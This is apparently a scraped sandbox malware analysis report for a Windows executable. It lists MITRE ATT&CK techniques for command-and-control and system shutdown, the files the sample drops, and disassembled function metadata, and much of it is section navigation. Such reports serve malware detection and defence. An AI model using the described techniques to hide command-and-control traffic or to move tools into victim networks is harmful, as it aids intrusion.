Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vq6jxdGvD6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31lo3jf4.fjl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5v4w4vq.s2q.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thgbzmv3.ftu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynq54asu.kkv.psm1

C:\Users\user\AppData\Local\Temp\nsb129A.tmp\Banner.dll

C:\Users\user\AppData\Local\Temp\nsb129A.tmp\UserInfo.dll

C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ

C:\Users\user\AppData\Local\unshabbily\Polarklimas.Und

C:\Users\user\AppData\Local\unshabbily\Toral\irresolubleness.hje

C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe

C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe:Zone.Identifier

C:\Users\user\AppData\Local\unshabbily\dicyclopentadienyliron.skr

C:\Users\user\AppData\Local\unshabbily\fjernkontrollers.hid

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
vq6jxdGvD6.exe

Function 004031BB Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 368
stringcomfileCOMMON

Function 00405194 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 004056F7 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 004065BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403B1C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 0040377F Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402D48 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00405F51 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 00405056 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 0040551C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 00406259 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00402F81 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 00405AF7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON